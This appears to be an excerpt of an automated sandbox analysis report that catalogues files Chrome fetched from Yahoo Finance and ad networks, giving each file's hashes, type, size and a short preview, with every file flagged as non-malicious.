                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537073028&val=762ea472-5895-428a-8611-5c0c938b2f29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 25.12 (Windows), datetime=2024:09:11 20:32:09], baseline, precision 8, 728x90, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):69462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.383170703460995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:bFUkzEr7j2nYyZmBPyJuY4Rnld5anAUxf+4H3Lk8aiyTo31Tocnf/JlZAjEdu:CkvnwBbVRnlzy7jW1olRnplWIdu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E26F2FCBCAF5732DC972D3E44A6871CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:169B43054F5C89602FE50CE1AE0565B63F946FB7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C64184F15A979E882FE02669F9392E6C5EAFE6D834209BD6159759E88883395D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B02097C2098AD0D9BC4C09DC2DE0154E48317C72DBC828943435842362AA76EC9999CE508073FA4036C51D1467AB6BC3B37F623BD543555A8012ED21220BA36D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.....*Exif..MM.*.............................b...........j.(...........1..... ...r.2...........i....................'.......'.Adobe Photoshop 25.12 (Windows).2024:09:11 20:32:09.......................................Z..............................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..[...],}.:v.[K.c.C+....2.)vC...Hs..#.rw-...z..~I..i.cX..Y.^....:..[....?2..U.........:Cs-..U........._.d..7.Il@.8... rF.O..c.....~...(.G.[..v.+<..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.208359994763881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:yvOCf5Yi4RixvkfPwR6/RNWc0jnQR0hFEzos:y2nD//Cr4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BD4D30BF2431199179FA9AFBDB1CCB76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2D9EDBDAAB2CE633D3B826EC363AA98A8894900D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08C8E3BFE30297FB8AEEE20FC667F6F18AC7F19C49B4987CDD81078BCE8A2100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8BF97C1FEA028DAF20BDCA75591C40AF307078DA2502C6F0F2F951DC9573859B8744F3F9430B110F36ADF8589639B214AA6E5086987D0518A0D6E932F9FE2886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=["ctopid","hashtag","wiki_topics"],n=["defaultLREC","lighthouse","spotlight","bankratewidget"],o=["pd","pt","pct","lmsid","lpstaid","hashtag","pstaid"],a={att:"yhp",autos:"yautos",entertainment:"yent",finance:"yfin",fp:"yhp",gma:"ynews",lifestyle:"ylife",movies:"ymov",music:"yent",news:"ynews",sports:"ysports",style:"ylife",tech:"ytech"},r={hashtag:!0,lang:!0,region:!0,site:!0,spaceid:!0},c=["lmsid","lpstaid","pt","pd","ver","pct"],d=["sda-COMMENTSWFPAD-iframe"];const l=e=>new Promise((t=>setTimeout(t,e))),h=(e,{className:t,id:i,tagName:s})=>{if(e)return t&&!e.classList.contains(t)||i&&i!==e.id||s&&e.tagName!==s?h(e.parentElement,{className:t,id:i,tagName:s}):e},w=t=>{if(!t||t.startsWith("/"))return t;const{hostname:i,pathname:s}=new UR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5907)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.397316073010132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:RQjtliWn1qX5rzvh+BFa1dItJOEclEuKnV+P5r7ng2cQrBp6CxJmS5/H+Rl:RGnioI5+Udqic+ZgVMm+/H+Rl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5097F4D5A7697E8BEDBDA51E77F15FE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1D0597ADE41D9657605347649EC193F5D2692357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FA65B0CA9F2DA6874919154DB6DCDC3E81E91D0B53E78A7AE341D0F18D5B2414
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D2AADF3A99158AA11E1BE6A54BB1398C8A7C77CE9DAD1DAEDB3524BD1B79B5782E702F074BE882EE19C57ED8F6F7BA50DEAD723168BE94DA83449E030885C8A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as L,p as z,k as b,n as v,i as g,A as J,e as p,t as S,d as w,f as V,h as C,q as N,B as D,l as T,m as q,N as h}from"./scheduler.Dr9AAxFe.js";import{g as K}from"./spread.CgU5AtxT.js";import{S as E,i as A,c as W,b as X,m as Y,t as Z,a as x,d as $}from"./index.DCSmZEjO.js";import{P as U,Q as B,N as ee}from"./commonUtil.CI22_Irn.js";import{T as te}from"./Ticker.DylReISl.js";function le(l){const t=l.slice(),e=t[4]||{};return t[10]=e.fmt!==void 0?e.fmt:"-",t[11]=e.raw!==void 0?e.raw:"-",t}function H(l){let t,e,n=U(l[11])+"",i,a=l[10]+"",r,o,c,f,_,m=[{"data-test":"colorChange"},{"data-symbol":l[3]},{"data-field":c=l[1].id},{"data-trend":"txt"},{"data-pricehint":f=l[0].original.priceHint||2},{"data-value":_=l[11]},{"data-tstyle":"default"},l[2]?{active:""}:{}],u={};for(let s=0;s<m.length;s+=1)u=J(u,m[s]);return{c(){t=p("fin-streamer"),e=p("span"),i=S(n),r=S(a),this.h()},l(s){t=w(s,"FIN-STREAMER",{"data-test":!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-pricehint":!0,"data-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2675)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.930263305500396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:ctyHFyhydAXhwKV/hCCXH7lhHdQdlvye2fuy3h5DweyyrctPuyT5yMuHf4ZcRqVO:52jXHcz2QAMyIxQZ0oPnWqjJ/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:228213C3B1F1DEB1105017E078696C22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EDD819811C403FA4A8E7F466FEB0C1B984488388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F005CC616422B811506FCDDB11E06FA4DEC751AE004E43032F26874E1FAD4D5A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3BF95FBBC65CF78D025EDAAF4A662EE8D267182412885394BF6D372C895FCAD0EEE160E047F1295137EBE585CE2B166FFA3406C765BED57600C46B0F30B33149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/EventCalendarPreview.CD7glI99.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.upscaled-title-wrapper.yf-kizpkq .title.yf-kizpkq{display:none}.wrapper.yf-kizpkq.yf-kizpkq{display:flex;flex-direction:column;height:90%;padding:0 var(--space-3)}.empty-state.yf-kizpkq.yf-kizpkq{color:var(--text2);height:100%;display:flex;flex-direction:column;justify-content:center;align-items:center;margin:var(--space-5) 0}li.yf-kizpkq.yf-kizpkq{border-bottom:1px dashed var(--separator);padding-top:var(--space-1);padding-bottom:var(--space-1)}li.yf-kizpkq.yf-kizpkq:hover{background-color:var(--table-hover)}li.yf-kizpkq .actual.yf-kizpkq{display:none}li.past.yf-kizpkq .actual.yf-kizpkq{display:block}li.past.yf-kizpkq .pill.yf-kizpkq{font-size:var(--font-s);font-weight:var(--font-normal);background-color:var(--separator)}li.clickability.yf-kizpkq .pill.yf-kizpkq{background-color:transparent;padding-left:0;padding-right:0}li.yf-kizpkq.yf-kizpkq:last-child{border-bottom-width:0}li.yf-kizpkq .data-wrapper.yf-kizpkq{display:grid;grid-template-columns:repeat(3,1fr);white-space:nowrap;text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):210
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.047955900193768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:HrHICMIqSPJJNDSNmogSVoBM4uQoSaCwERMsyI3iaG6sE1jC:HcLcDDSNSn64urSaCw41yI5njC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9CF0D5BFB247F400174FEED513DC8D70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AB2FDA23EE6A185A1406AFCAECB46DF1C4452FCA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DD211715F742BAC09CABCF7BDCA73E6736681C65089CD765CA862C598CABAC0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:640A093CC74333AE3B4AE261AB2C669143AAEE072EA5DBE82DD8F5F6453AC84D735A7B9DB734E003641367D1AC0AC3307B10F49659DC87CA79B9A29B472C2265
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/StarRating.BsIEvvGF.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:canvas.yf-2mvkrb{width:140px;height:25px;float:right}div.yf-5aq78w{width:50px;height:20px}div.expandWidth.yf-5aq78w{display:flex;width:100%}.star-rating.yf-v7fczo{display:flex;justify-content:flex-end;gap:6px}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10913), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.254821090865018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:FGUAMQ23qSDZJQD3BLcevTbUQUuUSUh6Cle/pnttCLkqFj0:MU1QXnDxLtfhU8/EupOgqh0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:336B804960F2D2E05B7372CFCF7CA6F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EDDC49C133EC21645B2AE1FB0D269856A1821449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B4235ED7DE3D5310BF6EAF35A3F5672AD57453D2AADC627AE0EC66016450D5F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7EFF7E0255E665E4766961596F1CCC27FAF04D6D18435CD44AFD8A7F1811954D9C267B9CC19CCB737639FCE28ED40E5D61F7EC264BFDCF812A003D32B79416AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(()=>{function r(r){return void 0===r?{b:0}:null!==r&&void 0!==r.b?{b:r.b+1|0}:r}function n(n){return null==n?void 0:r(n)}function e(r){if(null===r||void 0===r.b)return r;var n=r.b;return 0===n?void 0:{b:n-1|0}}function t(n,t){if(void 0!==n)return r(t(e(n)))}function i(r,n){if(void 0!==r)return n(e(r))}function a(r,n){return void 0!==r?e(r):n}function o(r,n){return void 0!==r?r:n}function u(r){return void 0!==r}var v=new Map;function d(r){var n,e=v.get(r);if(void 0!==e){var t=e+1|0;v.set(r,t),n=t}else v.set(r,1),n=1;return r+"/"+n}function c(r,n){return r.catch((r=>{return n((r=>null!=r&&"string"==typeof r.a)(e=r)?e:{a:"0j",o:e});var e}))}function f(r){return Promise.resolve(r)}function s(r,n){return r.then((r=>Promise.resolve(n(r))))}function m(r){return r.then((r=>Promise.resolve()))}var l=window,p=document;function w(r){return c(m(r),(r=>(((r,n)=>{var e=l.parent;null==e||e.postMessage({u:"/a/e",e:n+""},"*")})(0,r),Promise.resolve())))}function g(n){if(""!==n)try{return r(new URL(n))
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.723542173629519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:JRn/x/7IoQIYR8YUdgDk3S4CMFiVGBmIt9IviB:z/5dYUVS3tgmG6vi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A7A20AD5ABD17EBF0DE789E7E9C9FE9B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B7659D21354E6A74E696B42790F6E77273535171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1DBF80007750F3650B691E80E4369AB67F2A6DFC83EE1984DCBAA1E2478A1A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1E805A6A986399E62E7D5B4ABC07C6C42B09C442E4976D30FC9926C5761B95FB4BEA2D8D21639666384DA36825099082D527A12E81025737B9EA698BFD072E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{r as n,D as o}from"./scheduler.Dr9AAxFe.js";import{w as x}from"./43.CtYdpA_T.js";function s(t){return{setContext(e){return n(t,e)},getContext(){return o(t)}}}function c(t){const e=s(t);return{...e,setContext(r){return e.setContext(x(r))}}}export{c};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsv2Z2qDBfmJoqSu6Y2vTzVj17aILnPafbNc43GW4rXVn8KOTLVW1o0eHeEAs8LzS0VH65fW0jjVYGdr160srl3mzKOkUvM_CArP3Haj0KtF7j__Iqqxjw_LswQJexiuK7NvlrcgzCszzBV68H_RpX6TYGAdyuvcMzoz8aiPRr2qO9eL56xQKeOvKFL7Y9dgPRo&sai=AMfl-YQRQ0jx1M9qQTAV2VJvMhZDBmoqyDpPe8Bt7DOu1QJxJmIq6y2vZT4YIaz7KwW2ZPPZ1ke215COLeNKQRKLZbB0EUGR-NOL4MrW4R5oeHvl75DGj32OA4kWVtCx&sig=Cg0ArKJSzMwQubNrvtI-EAE&cid=CAQSPADpaXnffc04w10pZ5aC_psDX6cN6htP5BZ0DNrup28wrcAA-oZ9gndapKOw3RGV127Be4Our9QzvSEmpRgB&id=lidartos&mcvt=24254&p=24,276,114,1004&tm=41277.19999999995&tu=21.400000000023283&mtos=24254,24254,24254,24254,24254&tos=41256,0,0,0,0&v=20241007&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=20&adk=1521962139&rs=4&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=b&co=2434768501&rst=1728414880588&rpt=4718&isd=0&lsd=0&ec=1&met=ce&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmQgp3xvRYOLEhD9nyTz5XbYbToRlpMwFtc9k2yAyDkVVUcuUkZeDZBN7eIwyn3y92FjRXkBk1-mMlna6pVTuNuGrDpQ5tmDOQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=lijit_dbm&google_hm=SmRyQ0FMWkhma19TUk5jVlR0eXBWR3JU&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):51086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.36333089170413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:EoXRVtdFtXGtpfM5kT2xNGYUJmmp09VFUVdUv2dnEAxPPLaz7O3OFDN:FztNGtFMHr3wp09DOu2dnEANPLyP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AF551B67310E4C8FC63E60101C77C97F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B21E368A4F6155D50B56E0C3C0499D5D48CB4840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9C06AD28C759B0F000F55C83EB682C66755C308EEA80E2650906A308F9F9220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:47A91E029F4EA36D1F4B277833F425ECA70C894A2187DF82F05805F73E9B16D359F4F23E21EBD7D9B342373F2F75326396B14BEF0ED08E0337197707373C9A2D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/ss/analytics-3.54.3.js
